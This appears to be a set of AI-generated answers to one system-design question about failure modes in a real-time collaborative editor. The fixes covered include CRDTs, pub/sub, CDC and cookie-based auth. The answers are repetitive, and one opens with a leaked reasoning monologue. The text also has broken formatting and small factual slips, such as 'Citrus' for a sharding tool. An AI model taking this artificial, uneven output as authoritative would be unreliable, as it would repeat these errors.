|---|---|---|
| Pub/Sub layer (Redis or Kafka) | All servers subscribe to document channels; single source of truth | Additional infrastructure; Redis cluster adds complexity; single Redis = SPOF |
| WebSocket bridging | One server designated as "owner" per document; others proxy through owner | Owner becomes bottleneck; ownership transfer on failure is complex |
| Message Queue (RabbitMQ/Redis Streams) | Changes published to queue; all servers consume | Requires guaranteed ordering per document; added latency; operational overhead |
Recommendation: Redis Pub/Sub with server-side fanout. Accept Redis as a critical dependency and run it in Cluster mode with Sentinel for HA.
Problem:
Document state at T=0: "The quick brown fox"
User A selects "quick" → deletes → types "slow"
User B selects "brown" → deletes → types "red"
Server receives:
- Op1: replace(range("quick"), "slow")
- Op2: replace(range("brown"), "red")
If Op1 arrives first: "The slow brown fox"
If Op2 arrives first: "The quick red fox"
Last-write-wins doesn't apply here—both operations target different positions. But if operations arrive out of order, or if deletion shifts indices, the final state is undefined.
Failure Mode:
Solutions:
| Solution | Mechanism | Trade-offs |
|---|---|---|
| Character-level CRDTs | Each character is an insert/delete operation with unique IDs | Larger document size (2-10x); slower serialization |
| Fine-grained locking | Lock at paragraph level during edits | Blocks other users; poor user experience; deadlocks possible |
| Transform-based approaches (OT/CRDT) | Operations are transformed against each other | Significant implementation complexity |
Recommendation: CRDTs. The storage overhead is acceptable for collaborative editing.
Problem:
T=0: Document saved: "Hello"
T=1: User A adds " World"
T=2: Snapshot begins (slow operation)
T=3: User B adds "!"
T=4: Snapshot completes: "Hello World"
The saved snapshot doesn't include User B's "!"—that character is in PostgreSQL but not in the HTML file. If you restore from the HTML snapshot, you lose the "!".
Failure Mode:
Solutions:
| Solution | Mechanism | Trade-offs |
|---|---|---|
| Lock during snapshot | Block writes while snapshot is taken | Degrades responsiveness; users notice lag |
| Snapshot includes pending changes | Capture in-flight operations in snapshot | Complexity; potential for inconsistent reads |
| Remove periodic snapshots | Rely on PostgreSQL as source of truth | Increased PostgreSQL load; relies on PostgreSQL being highly available |
Recommendation: Remove periodic HTML snapshots unless you have a specific use case (rendering static versions). Use PostgreSQL for point-in-time recovery with WAL.
Problem:
T=0: User connected to Server A
T=1: User makes change C1 → Server A persists C1
T=2: Server A crashes
T=3: User reconnects to Server B
T=4: Server B polls PostgreSQL → gets C1
T=5: Server B sends C1 to user (but user already has C1)
T=6: Document shows "stale" flash or duplicate change
The user already has the change locally—they made it. But Server B doesn't know that.
Failure Mode:
Solutions:
| Solution | Mechanism | Trade-offs |
|---|---|---|
| Sequence numbers + acks | Client tracks last-seen sequence; server replays from gap | Complexity; network partitions cause long replay chains |
| Full state sync | Server sends complete document state on reconnect | Slow for large documents; high bandwidth; brief blank screen |
| Incremental sync | Server tracks per-client cursor position; sends from there | Requires persistent connection state per client |
Recommendation: Implement a hybrid: send last known sequence number; if gap > threshold, send incremental diff; if gap > large threshold, send full state.
Problem:
Initial connection: Load balancer → Server A
User edits document extensively
Server A becomes overloaded
Load balancer routes new users to Server B, C, D
Users editing the same document are now on different servers
Server A must broadcast to Server B, C, D
WebSocket connections are persistent and stateful. Round-robin doesn't account for:
Failure Mode:
Solutions:
| Solution | Mechanism | Trade-offs |
|---|---|---|
| Sticky sessions (source IP or cookie) | Same user always routes to same server | Uneven distribution if users cluster (same org); server failures orphan users |
| Document-aware routing | Route based on document ID to same server | Hot documents create bottlenecks; partitioning required |
| Consistent hashing | Same document ID maps to same server | Rebalancing on server add/remove requires data migration |
Recommendation: Consistent hashing with document ID as key. Accept that hot documents need sharding at the document level (partition by document ID range).
Problem:
User types at 60 WPM = 5 characters/second
Active users: 1,000
Write rate: 5,000 writes/second to PostgreSQL
Assuming 10ms per write (optimistic), you need 50 concurrent connections to sustain this load. PostgreSQL default max_connections is 100.
Failure Mode:
Solutions:
| Solution | Mechanism | Trade-offs |
|---|---|---|
| Batch writes | Buffer changes; write every N ms or N changes | Data loss on crash; higher latency for persistence |
| Change Data Capture (CDC) | Stream writes to Kafka; async persistence | Complexity; eventual consistency window; operational overhead |
| In-memory log + periodic flush | Append-only log in memory; flush to DB periodically | Risk of losing buffered writes; memory pressure |
Recommendation: Implement a write buffer (ring buffer or write-ahead log) with configurable durability. Acknowledge writes immediately from memory; flush to PostgreSQL asynchronously. Accept configurable data loss window (e.g., "up to 1 second of writes").
Problem:
CloudFront TTL: 5 minutes
User A edits paragraph 1
User B requests document state
CloudFront serves stale version (up to 5 minutes old)
User B sees User A's edits 5 minutes late
Real-time collaborative data should never be cached at the CDN layer.
Failure Mode:
Solutions:
| Solution | Mechanism | Trade-offs |
|---|---|---|
| Cache-Control: no-store | Disable CDN caching for API responses | Higher origin load; no benefit from CDN for dynamic content |
| Cache only static assets | Separate CDN behavior for static vs. dynamic | Need clear separation; can't cache document metadata |
| Short TTL (1-5 seconds) | CDN caches but invalidates quickly | Minimal benefit; added complexity |
Recommendation: Remove CDN caching for all /api/* routes. Use CDN only for static assets (JS, CSS, images). For global distribution, consider edge-computing WebSocket termination (e.g., Cloudflare Workers Durable Objects).
Problem:
Active documents: 10,000
Average document size: 50 KB
Document state per server: 10,000 × 50 KB = 500 MB
CRDT metadata overhead: 3-5x = 1.5-2.5 GB per server
Node.js heap default is ~1.4 GB. You're hitting memory limits quickly.
Failure Mode:
Solutions:
| Solution | Mechanism | Trade-offs |
|---|---|---|
| Document eviction | Unload inactive documents from memory | Reload latency; inconsistent behavior |
| External state store | Store CRDT state in Redis or memory-mapped DB | Redis becomes critical path for every operation |
| Tiered storage | Hot data in memory, cold data on disk | Complexity; added latency for cold documents |
Recommendation: Implement document eviction with LRU policy. Keep only top N active documents per server in memory. Use lazy loading for inactive documents.
Problem:
localStorage is accessible via JavaScript
XSS vulnerability → attacker reads localStorage → JWT stolen
Attacker uses JWT to authenticate as victim
localStorage is not encrypted at rest. Any JavaScript on your domain (including XSS) can read it.
Solutions:
| Solution | Mechanism | Trade-offs |
|---|---|---|
| HttpOnly cookies | JWT stored in HttpOnly, Secure cookie | Vulnerable to CSRF; requires SameSite attribute |
| Memory storage | JWT in JavaScript variable (lost on refresh) | Poor UX; requires re-authentication |
| Subresource Integrity + CSP | Prevent inline scripts; reduce XSS surface | Complexity; may break third-party scripts |
Recommendation: HttpOnly cookies with SameSite=Strict and CSRF tokens. If you must use localStorage, implement short-lived tokens (5-15 minutes) with silent refresh.
Problem:
Token issued at 9 AM
User laptop stolen at 10 AM
Attacker has 14 hours of access
Token cannot be revoked without server-side token blacklist
Solutions:
| Solution | Mechanism | Trade-offs |
|---|---|---|
| Short-lived tokens (15 min) + refresh tokens | Rotate tokens frequently; refresh tokens in HttpOnly cookie | Complexity; requires refresh endpoint |
| Token blacklist (Redis) | Revoke tokens on logout or security event | Redis becomes critical path; latency overhead |
| Sliding window expiration | Token validity extended on each use | Non-expiring sessions; harder to revoke |
Recommendation: 15-minute access tokens + 7-day refresh tokens. Refresh tokens stored in HttpOnly cookie, rotated on each use.
| Severity | Issue | Impact | Recommended Fix |
|---|---|---|---|
| Critical | Client-side timestamps | Data corruption | Server-side sequence numbers or CRDTs |
| Critical | Database polling | Inconsistency | Redis Pub/Sub or message queue |
| Critical | No OT/CRDT | Concurrent edit corruption | CRDTs (Yjs, Automerge) |
| Critical | CDN caching real-time data | Stale data served | Disable CDN caching for API |
| High | JWT in localStorage | Token theft via XSS | HttpOnly cookies |
| High | Round-robin load balancing | Uneven distribution | Consistent hashing |
| High | PostgreSQL write amplification | DB overload | Write buffer + async flush |
| Medium | 24-hour token expiry | Long-lived credential theft | Short-lived + refresh tokens |
| Medium | Periodic snapshots | Restore data loss | Rely on PostgreSQL WAL |
| Low | Memory pressure | OOM, GC pauses | LRU eviction |
┌─────────────────────────────────────────────────────────────────────┐
│ Clients (Browser) │
│ WebSocket (wss://) + HTTP API │
└─────────────────────────────────────────────────────────────────────┘
│
┌──────────────┴──────────────┐
│ Global Load Balancer │
│ (L7, cookie-based routing) │
└──────────────┬──────────────┘
│
┌──────────────────────────┼──────────────────────────┐
│ │ │
┌───────┴───────┐ ┌───────┴───────┐ ┌───────┴───────┐
│ Edge Region │ │ Edge Region 2 │ │ Edge Region N │
│ (Cloudflare │ │ (Optional) │ │ (Optional) │
│ Workers) │ └───────────────┘ └───────────────┘
└───────┬───────┘
│ WebSocket Gateway
│ (Sticky sessions per document)
│
┌───────┴───────┐
│ API Server │
│ (Node.js) │◄───► Redis Cluster (Pub/Sub + Session)
│ │◄───► PostgreSQL Primary
│ Yjs/Document │◄───► Kafka (for replay/disaster recovery)
│ CRDT State │
└───────┬───────┘
│
│ Changes persisted via
│ CDC or direct write
│
┌───────┴───────┐
│ PostgreSQL │
│ Replicas (RO) │
└───────────────┘
Key architectural changes:
Here’s a comprehensive analysis of potential failure modes, race conditions, and scaling bottlenecks in this architecture, along with proposed solutions and their trade-offs:
Issue:
Solution:
Issue:
Solutions:
Issue:
Solutions:
version column to detect conflicts and reject stale writes (instead of LWW).
organization_id to distribute load.
Issue:
Solutions:
Issue:
Solutions:
Issue:
Solutions:
Cache-Control: no-cache header or ETag for dynamic content.
Issue:
Solutions:
(organization_id, document_id) or use consistent hashing.
Issue:
Solutions:
/health endpoints and configure the load balancer to remove unhealthy servers.
Issue:
Solutions:
change_id with each operation to deduplicate retries.
change_ids).Issue:
Solutions:
Issue:
Solutions:
Issue:
Solutions:
sequence_id with each change to order them correctly.
| Issue | Solution | Trade-off |
|---|---|---|
| Clock sync (LWW) | Server-side timestamps or CRDTs | Latency or complexity |
| WebSocket scaling | Redis Pub/Sub or shared WebSocket layer | Cost or vendor lock-in |
| PostgreSQL polling | CDC or logical decoding | Complexity |
| JWT security | HTTP-only cookies + refresh tokens | Mobile app complexity |
| CDN caching | Disable for API or use cache tags | Higher backend load |
| Split-brain | CRDTs or quorum-based writes | Complexity or latency |
| Thundering herd | Randomized polling or change feed | Latency or complexity |
(org_id, doc_id) to distribute load.These changes would make the system more scalable, resilient, and secure, albeit with added complexity.
Here’s a comprehensive analysis of potential failure modes, race conditions, and scaling bottlenecks in this architecture, along with proposed solutions and their trade-offs:
ip_hash or least_conn) to ensure sticky sessions.localStorage are vulnerable to XSS attacks.Secure and SameSite flags).| Issue | Solution | Trade-off |
|---|---|---|
| WebSocket connection drops | Heartbeat + exponential backoff | Network overhead |
| WebSocket server failure | Sticky sessions + Redis session store | Complexity |
| LWW conflicts | OT/CRDTs | High complexity |
| Clock skew | Server-authoritative timestamps | Latency |
| PostgreSQL write bottleneck | Batch writes + WAL | Latency |
| Polling overhead | CDC (Debezium) or Redis Pub/Sub | Complexity |
| Full HTML snapshots | Deltas + compression | Complexity |
| Load balancer bottleneck | Least-connections + consistent hashing | Complexity |
| Redis SPOF | Redis Cluster | Operational cost |
| JWT in localStorage | HttpOnly cookies | WebSocket complexity |
| No rate limiting | Redis-based rate limiting | Redis dependency |
| Eventual consistency | CDC or distributed locks | Latency/complexity |
| Hot partitions | Shard by document ID | Query complexity |
| No circuit breakers | Hystrix/Resilience4j | Latency |
| No observability | Distributed tracing | Overhead |
This architecture can work for a small-to-medium scale, but for Google Docs-level scale, consider:
Here’s a comprehensive analysis of potential failure modes, race conditions, and scaling bottlenecks in this architecture, along with proposed solutions and their trade-offs:
UPDATE ... WHERE version = X) to avoid lost updates.google-diff-match-patch).synchronous_commit = remote_apply in PostgreSQL).localStorage are vulnerable to XSS attacks. If an attacker injects JavaScript, they can steal the token.localStorage.SameSite and CSRF tokens).ulimit -n).ws library with connection reuse).no-cache for dynamic endpoints).INCR + EXPIRE).| Issue | Solution | Trade-off |
|---|---|---|
| WebSocket disconnections | Heartbeat + exponential backoff | Network overhead |
| Cross-server sync latency | Redis Pub/Sub or PostgreSQL CDC | Complexity, Redis persistence |
| Clock skew in LWW | Server-side timestamps or OT/CRDTs | Latency or implementation complexity |
| PostgreSQL write contention | Batch writes + optimistic locking | Latency or retry logic |
| Full HTML snapshots | Store deltas instead | Complex conflict resolution |
| JWT in localStorage | HTTP-only cookies + refresh tokens | CSRF risk |
| WebSocket connection limits | Dedicated WebSocket service | Cost, vendor lock-in |
| Concurrent edits | OT/CRDTs or paragraph-level merging | Complexity |
| PostgreSQL SPOF | Multi-AZ setup + automatic failover | Cost, complexity |
| No offline support | Client-side offline editing | Complex sync logic |
This architecture is workable but has several scalability and reliability risks. Addressing these issues will make it more robust for production use.
This architecture has several potential failure modes, race conditions, and scaling bottlenecks. Below is a detailed analysis with proposed solutions and their trade-offs:
Issue: Each API server maintains its own WebSocket connections, meaning clients connected to different servers won’t receive real-time updates from each other. This breaks the collaborative experience.
Solution:
Issue: Relying on client timestamps for conflict resolution is unreliable due to clock skew. Two users editing the same paragraph could lead to lost updates if timestamps are close.
Solution:
Issue: Servers poll PostgreSQL every 2 seconds, which is inefficient and doesn’t scale well with many servers.
Solution:
Issue: Saving full HTML snapshots every 30 seconds is inefficient for large documents and can lead to high storage costs.
Solution:
Issue: Storing JWT tokens in localStorage is vulnerable to XSS attacks.
Solution:
Issue: Caching API responses for 5 minutes in CloudFront can lead to stale document data.
Solution:
Issue: Read replicas can serve stale data, leading to inconsistencies in real-time collaboration.
Solution:
Issue: If one organization has a very active document, its partition could become a bottleneck.
Solution:
Issue: Changes are only broadcast to clients connected to the same server, requiring other servers to poll for updates.
Solution:
Issue: A malicious user could spam WebSocket messages, overwhelming the server.
Solution:
These changes would significantly improve reliability, scalability, and security but come with added complexity and operational overhead.
This architecture has several potential failure modes, race conditions, and scaling bottlenecks. Below is a detailed analysis with proposed solutions and their trade-offs.
Recommended Solution: Option 1 (Redis-backed WebSocket service) for simplicity and real-time guarantees.
transaction_id or a sequential ID).Recommended Solution: Option 2 (OT or CRDTs) for correctness, but if simplicity is key, Option 1 (server-assigned timestamps) is a good compromise.
Recommended Solution: Option 1 (CDC with Kafka) for real-time sync without polling.
org_id).Recommended Solution: Option 1 (sharding) + Option 3 (optimized snapshots) for a balanced approach.
localStorage.Recommended Solution: Option 1 (HttpOnly cookies + short-lived tokens) for better security.
ETag headers and let clients use If-None-Match.ETag matches.Recommended Solution: Option 1 (cache invalidation) for a balance between freshness and performance.
Recommended Solution: Option 1 (WAL) + Option 2 (frequent snapshots with deltas) for durability.
| Issue | Solution | Trade-offs |
|---|---|---|
| WebSocket server affinity | Redis-backed WebSocket service | Adds Redis dependency |
| Last-write-wins conflicts | Operational Transformation (OT) | Complex to implement |
| Polling-based inter-server sync | PostgreSQL CDC + Kafka | Adds Kafka complexity |
| PostgreSQL write bottlenecks | Sharding + optimized snapshots | Cross-shard transactions |
| JWT security risks | HttpOnly cookies + short-lived tokens | More token rotation logic |
| Stale CDN caches | Cache invalidation on write | CloudFront invalidation costs |
| Snapshot data loss | Write-ahead log (WAL) | Recovery complexity |
org_id and optimize snapshots.This makes the system more scalable, fault-tolerant, and correct while keeping complexity manageable.
Based on the provided architecture, here are potential failure modes, race conditions, and scaling bottlenecks along with proposed solutions and their trade-offs:
Database Write Contention
WebSocket Connection Loss
Last-Write-Wins Conflict Resolution
API Server Polling Latency
CDN Caching Invalidation
Single Point of Failure (Load Balancer)
Document Partitioning by Organization ID
API Server Desync
Addressing these failure modes, race conditions, and scaling bottlenecks will improve the overall reliability, performance, and scalability of the real-time collaborative document editor. However, each solution comes with its own trade-offs that should be carefully considered based on the specific use case and requirements.
Here’s a comprehensive analysis of potential failure modes, race conditions, and scaling bottlenecks in your real-time collaborative document editor architecture, along with proposed solutions and trade-offs:
Failure Modes:
Race Conditions:
Solutions:
WebSocket Heartbeats + Reconnection Logic:
session_token (JWT) to the new server, which fetches the latest document state from PostgreSQL and replays missed changes.Sticky Sessions (if using load balancer):
Failure Modes:
Race Conditions:
Solutions:
Hybrid Logical Clocks (HLC):
Operational Transformation (OT) or CRDTs:
Failure Modes:
Race Conditions:
Solutions:
Change Data Capture (CDC):
Redis Pub/Sub for Cross-Server Communication:
Scaling Bottlenecks:
Failure Modes:
Solutions:
Delta Snapshots:
Shard by Document ID:
organization_id (as planned) but also shard PostgreSQL by document ID to distribute write load.Caching Frequently Edited Documents:
organization_id as key).Failure Modes:
Race Conditions:
Solutions:
Short-Lived Tokens + Refresh Tokens:
/refresh endpoint.WebSocket-Level Authentication:
Failure Modes:
Solutions:
Multi-Layer Caching:
Redis Sentinel or Cluster:
Failure Modes:
GET /documents/:id) may be cached incorrectly.Solutions:
Cache Invalidation Headers:
Cache-Control: no-cache or max-age=0 for mutable endpoints (e.g., document updates).main.[hash].js) to bust cache on deploy.Edge Workers:
Scaling Bottlenecks:
Solutions:
Stateless API Servers with External WebSocket Broker:
Database Connection Pooling:
Failure Modes:
Solutions:
Operational Transformation (OT):
CRDTs (Conflict-Free Replicated Data Types):
Failure Modes:
Solutions:
Multi-Region PostgreSQL:
Regular Backups:
| Issue | Solution | Trade-off |
|---|---|---|
| WebSocket reconnections | Sticky sessions or session tokens | Reduced load balancing flexibility |
| LWW race conditions | HLC or OT/CRDTs | Added complexity |
| Cross-server sync delays | CDC or Redis Pub/Sub | Infrastructure complexity |
| Database bottlenecks | Delta snapshots or sharding | Operational overhead |
| JWT expiry | Short-lived tokens + refresh tokens | Auth flow complexity |
| Redis failures | Multi-layer caching | Increased storage costs |
| CDN stale cache | Cache invalidation headers | Reduced CDN efficiency |
| Horizontal scaling | External WebSocket broker | Added latency/dependency |
| Edit conflicts | OT or CRDTs | Higher implementation complexity |
| Disaster recovery | Multi-region DB + backups | Cost and operational overhead |
This architecture can scale to thousands of concurrent users but requires careful trade-offs between complexity, cost, and consistency.
Here’s a comprehensive analysis of the failure modes, race conditions, and scaling bottlenecks in the proposed architecture, along with specific solutions and trade-offs for each:
/updates?lastSeen=timestamp).ws:user123:serverId) and allow any server to take over./assets/v2/) whenever static files change.createdAt: ISODate.now()).Text CRDT for collaborative editing).version column to the documents table and require UPDATE ... WHERE version = expected_version.documents table into shards (e.g., documents_shard_1, documents_shard_2) based on document_id % N.JOIN across shards); requires application-level routing.maxmemory-policy allkeys-lru.sessions-shard-1, ws-shard-1)./assets/* every 5 minutes instead of per file).stale-while-revalidate to serve stale content while revalidating.| Issue | Solution | Trade-off |
|---|---|---|
| Offline Editing | Use CRDTs + local storage | Higher client-side complexity |
| Document Locking | Optimistic locking (like Git) | May cause merge conflicts |
| Large Document Edits | Chunked updates (e.g., 1KB at a time) | Higher WebSocket overhead |
| Cross-Region Latency | Multi-region deployment | Data consistency challenges |
| Abusive Users | Rate limiting + IP blocking | May block legitimate users |
The biggest risks in this architecture are:
Trade-offs to consider:
Would you like a deeper dive into any specific area (e.g., OT implementation, Kubernetes scaling, or CRDTs)?
Below is a thorough analysis of the proposed architecture for a real-time collaborative document editor. I've identified 12 critical failure modes, race conditions, and scaling bottlenecks based on the described system. For each issue, I explain the root cause, provide a concrete solution, and detail the trade-offs (including performance, complexity, consistency, and operational impacts). My analysis focuses on practical, production-relevant flaws that would manifest under real-world usage (e.g., network partitions, clock skew, traffic spikes), not just theoretical edge cases.
Failure Mode: The system relies on polling every 2 seconds for inter-server synchronization (Step 4: "Other servers poll PostgreSQL every 2 seconds for changes"). This means:
Solution: Replace polling with a publish/subscribe (pub/sub) mechanism (e.g., Redis Streams or Apache Kafka) for real-time change propagation.
doc:{doc_id}). - All API servers subscribe to relevant channels and apply changes immediately upon receipt.Trade-offs:
Failure Mode: The sync strategy uses "last-write-wins with timestamps from client clocks" (Step 5). This is fundamentally unsafe for collaborative editing:
Solution: Implement Operational Transformation (OT) or Conflict-free Replicated Data Types (CRDTs) with server-generated logical timestamps.
now() or a hybrid logical clock) to eliminate client-clock reliance.Trade-offs: - ✅ Pros: Guarantees convergence (all clients see identical state), preserves user intent, and eliminates silent data loss. OT/CRDTs are industry standards for collaborative editors (Google Docs uses OT; Notion uses CRDTs).
Failure Mode: "Each API server maintains its own WebSocket connections to clients" with no failover mechanism. If a server crashes (e.g., due to deploy, OOM, or network partition):
Solution: Decouple WebSocket state from API servers using a shared connection store (e.g., Redis) and stateless WS handlers.
ws:{conn_id} → {user_id, docs}).Trade-offs:
Failure Mode: Step 4 states servers "poll PostgreSQL every 2 seconds for changes." At scale, this creates predictable, avoidable load:
SELECT ... WHERE updated_at > last_poll_time, which:
Solution: Use PostgreSQL’s built-in logical replication (via pgoutput plugin) with a change data capture (CDC) tool (e.g., Debezium) to stream changes to a message queue (e.g., Kafka or Redis Streams).
INSERT/UPDATE/DELETE on the documents table.db.server1.documents).Trade-offs:
Failure Mode: Storing "full HTML snapshots every 30 seconds" (Storage section) causes:
{op: "insert", pos: 42, text: "Hello"}) to the server.Trade-offs:
Failure Mode: Auth uses "JWT tokens with 24-hour expiry, stored in localStorage." This introduces critical security risks:
localStorage and impersonate users indefinitely (until token expiry).Solution: Implement short-lived access tokens + HTTP-only refresh tokens.
Authorization: Bearer header./refresh endpoint (cookie-sent automatically).localStorage or sessionStorage for auth.Trade-offs: - ✅ Pros:
Failure Mode: "CloudFront [...] also caches API responses for 5 minutes" risks serving stale or dangerous data:
GET /doc/{id} (e.g., due to misconfigured Cache-Control headers), a user requesting a doc mid-edit could get:
POST /doc/{id}/edit request is accidentally cached (e.g., if the API returns 200 with body), subsequent GETs might show the pre-edit state until cache expires.Solution: Explicitly disable caching for all API endpoints and cache only static assets.
Cache-Control headers on API responses:
Pragma: no-cache
Expires: 0
``` - Configure CloudFront to:
- Cache `/*` for static assets (e.g., `/static/js/*.js`, `/assets/*`) with long TTL (e.g., 1 year).
- Set `/*` for API paths (e.g., `/api/*`) to **origin only** (no caching).
Trade-offs:
Failure Mode: The scaling plan mentions "document partitioning by organization ID," which risks severe load imbalance:
Solution: Use hybrid partitioning combining organization ID with document-level hashing.
(organization_id, hash(document_id)) or hash(organization_id || document_id).hrw or maglev hash ring) to map (org_id, doc_id) to a specific DB shard or cache slot.{org_id}:{doc_id}) to keep related data on same shard. - Optional: Add automated rebalancing (e.g., via Kubernetes HPA + custom metrics) to shift load when hotspots emerge. Trade-offs:Failure Mode: The architecture assumes constant connectivity (WebSocket → server → PG). If a user loses internet:
Trade-offs:
Failure Mode: Step 2 states: "Server writes change to PostgreSQL" on every WebSocket change event (e.g., per keystroke). This causes:
Solution: Batch changes client-side and use write-behind persistence.
{ops: [...], doc_id: X, version: Y}).COPY or bulk insert for batches (e.g., every 500ms or 100 ops).Trade-offs:
Failure Mode: The system assumes a stable network between clients, API servers, and DB. During a network partition (e.g., AWS AZ outage):
Solution: Design for partition tolerance using a leader-follower DB setup with explicit consistency levels.
Trade-offs:
Failure Mode: The data flow lacks idempotency guarantees for WebSocket messages (Step 1: "User types → change event sent via WebSocket"). If a message is retransmitted (due to WS retry, network glitch, or client reconnect):
Solution: Require client-generated unique IDs for all operations and enforce idempotency server-side.
{id: "uuid", op: "insert", pos: 5, text: "A"}).(client_id, event_id).Trade-offs:
This architecture has strong foundations (React frontend, Node.js API, PostgreSQL/Redis) but contains several fatal flaws for real-time collaboration that would manifest under load or failure. The most urgent fixes are:
These changes would transform the system from a fragile prototype into a production-grade collaborative editor. The trade-offs (increased complexity, minor latency) are universally justified by the gains in correctness, scalability, and user experience. For context: Google Docs, Figma, and Notion all use variations of these patterns—there are no shortcuts for real-time collaboration at scale.
If implementing these, prioritize:
Okay, let's tackle this problem. The user provided an architecture for a real-time collaborative document editor and wants me to identify failure modes, race conditions, scaling bottlenecks, and propose solutions with trade-offs. Hmm, where to start?
First, I need to understand the system thoroughly. The frontend is a React SPA using WebSockets. Backend is Node.js with load balancer, PostgreSQL, Redis. Real-time is handled by each API server maintaining WebSocket connections. Sync strategy is last-write-wins with client timestamps. Storage is HTML snapshots every 30 seconds. Auth is JWT in localStorage. CDN for static assets and API caching.
Alright, failure modes. Let's think about possible points of failure. WebSocket connections dropping? That's a problem because real-time sync relies on WebSockets. If a client disconnects, their changes might not get through. Also, if the API server goes down, that's bad. Load balancer failure could route traffic to a dead server. PostgreSQL issues like replication lag or downtime. Redis cache problems affecting session management. CDN cache serving stale data.
Race conditions. Since they use last-write-wins based on client timestamps, if two users edit the same part simultaneously, the timestamps could be off due to clock skew. That's a classic race condition. Also, when servers poll for changes every 2 seconds, there might be conflicts not detected in time. What about when a document is partitioned by organization ID? If a document is being edited across multiple partitions, maybe there's inconsistency.
Scaling bottlenecks. The load balancer is round-robin, but if some servers are handling different documents, maybe uneven load? PostgreSQL might become a bottleneck if all writes go through it and replication lags. Redis could be a bottleneck if many sessions are stored there. WebSocket connections per server limit? If each server has a max number of clients, scaling horizontally might require managing that. Document partitioning might not scale well if some organizations are very large.
Now, for each issue, propose a solution. Let's start with WebSocket failures. If a client disconnects, their changes might be lost. Solution: Maybe implement a message queue (like Kafka or RabbitMQ) to persist changes even if WebSocket drops. Trade-off is added complexity and latency.
API server downtime: Use a load balancer with health checks. If a server is down, LB stops routing traffic. Trade-off is LB needs to be reliable.
PostgreSQL replication lag: When polling every 2 seconds, if replication is slow, servers might not get the latest changes. Solution: Use synchronous replication or a more aggressive polling interval. Trade-off is increased latency or cost.
Redis session cache failures: If Redis is down, sessions might not be tracked. Solution: Use a fallback like localStorage for sessions, but that's less secure. Trade-off is security vs availability.
CDN cache serving stale data: If CDN caches API responses, updates might not propagate immediately. Solution: Invalidate cache on updates. Trade-off is increased CDN cost or complexity.
Real-time sync conflicts: Last-write-wins with client clocks. Clock skew could lead to incorrect conflict resolution. Solution: Use a centralized time source like NTP or logical clocks (Lamport timestamps). Trade-off is added overhead for time sync.
Polling interval causing conflicts: If polling every 2 seconds, changes might be missed. Solution: Reduce polling interval or use WebSockets for all updates. But WebSockets are already used for real-time. Maybe need to handle both? Trade-off is higher server load from more connections.
Document partitioning: If a document is split across partitions, concurrent edits might not sync properly. Solution: Ensure each document is in a single partition. Trade-off is scalability if organizations are large.
Also, JWT stored in localStorage is vulnerable to XSS. If XSS attack, attacker can steal tokens. Solution: Use HttpOnly cookies instead. Trade-off is session management complexity.
Another thing: The sync strategy is last-write-wins. That might lead to data loss if two users overwrite each other's changes. Maybe offer conflict resolution options? Trade-off is user experience vs data integrity.
Scaling the WebSocket connections: Each API server handles its own WebSockets. If a server runs out of connections, clients might not connect. Solution: Use a connection pool or a dedicated WebSocket server. Trade-off is architectural complexity.
Database read replicas: If writes are heavy, read replicas help. But if the primary DB is overwhelmed, writes could be slow. Solution: Sharding the database? But that's complex. Trade-off is increased database management.
So, compiling all these thoughts into a structured list with each issue, solution, and trade-off. Need to make sure each point is specific and addresses the architecture given. Here's a detailed analysis of potential issues in the architecture, along with solutions and trade-offs:
localStorage is vulnerable to XSS attacks, compromising user sessions.This architecture is resilient to many failures but requires careful tuning of trade-offs between real-time responsiveness, data consistency, and operational complexity.
Failure Modes and Solutions:
WebSocket Server Failure:
PostgreSQL Write Overload:
Clock Skew in Timestamps:
Race Conditions and Solutions:
Concurrent Edits on the Same Paragraph:
Polling Delay in Server Synchronization:
Scaling Bottlenecks and Solutions:
Load Balancer Round-Robin Distribution:
JWT Token Storage in localStorage:
CDN Caching of API Responses:
By addressing these failure modes, race conditions, and bottlenecks, the architecture can become more robust, scalable, and efficient for real-time collaboration.
This architecture contains several critical flaws that would prevent the application from functioning as a true real-time collaborative editor ("Google Docs" style). The issues range from data corruption risks to severe performance bottlenecks.
Here is a detailed breakdown of the failure modes, race conditions, and scaling bottlenecks, organized by severity.
This is the most severe category. The proposed sync strategy effectively makes true collaboration impossible.
Date.now() from the client browser for conflict resolution.SELECT * FROM changes every 2 seconds, regardless of whether users are typing./api/docs/* endpoints or use strict Cache-Control: no-store headers. CDNs should only cache static assets (JS/CSS/Images).localStorage makes them vulnerable to Cross-Site Scripting (XSS). If an attacker injects a script, they can steal the token and impersonate the user.To make this architecture viable, you need to shift from a "Database-centric polling" model to a "Stream-centric push" model.
This architecture for a real-time collaborative document editor has several promising elements (WebSockets, Redis, PostgreSQL, CDN), but it also contains significant flaws in consistency, scalability, and reliability. Below is a comprehensive breakdown of failure modes, race conditions, and scaling bottlenecks, along with specific solutions and their trade-offs.
Recommended: Use CRDTs (Conflict-Free Replicated Data Types) for real-time sync (e.g., Yjs, Automerge). Best for scalability and offline support.
doc:123:updates.✅ Use Redis Pub/Sub for real-time sync, add Kafka for audit log/event sourcing if needed.
doc:123) for efficient routing.✅ Use Redis Pub/Sub for low-latency sync, and store full history in PostgreSQL for recovery.
Example: Use Yjs (CRDT) on frontend and backend — syncs deltas, not full state.
✅ CRDTs are the modern standard for collaborative editing (e.g., Figma, Google Docs).
✅ Combine: Snapshot every 10 mins + op log. On load: get snapshot + replay recent ops.
✅ Best: Use CRDTs with stateless servers — no leader needed.
localStorage makes them accessible to client-side scripts → vulnerable to XSS attacks.✅ Use httpOnly cookies + short-lived JWTs.
Cache-Control: no-store or very short TTL.✅ Disable CDN caching for all document/editing APIs.
✅ Use Yjs or similar — handles offline, sync, and conflict.
✅ Use Redis as working store, PostgreSQL as cold storage/backup.
doc_id → map to Redis cluster or DB shard.✅ Use Citrus or custom sharding by doc_id.
✅ Use token bucket rate limiting per user/connection.
| Issue | Solution | Trade-off |
|---|---|---|
| Client clock skew | Use CRDTs or server-assigned logical clocks | Complexity ↑ |
| Incomplete real-time sync | Add Redis Pub/Sub between servers | New dependency |
| Polling DB every 2s | Replace with message bus push | Ops complexity ↑ |
| LWW overwrites | Use CRDTs (e.g., Yjs) | Learning curve |
| Full HTML snapshots | Delta + op log + snapshots | Storage ↑, consistency ↑ |
| JWT in localStorage | Use httpOnly cookies | CSRF risk → needs mitigation |
| CDN caching API | Disable for dynamic routes | Higher origin load |
| WebSocket drops | Client queue + ACKs | Offline complexity |
| DB write bottleneck | Redis as write buffer | Risk of Redis data loss |
| No global consistency | CRDTs + message bus | Stateless, scalable |
| Sharding | Shard by doc_id | Cross-shard queries hard |
[Client]
→ (WebSocket + Yjs)
→ API Server
→ Redis (Pub/Sub for real-time, storage for ops)
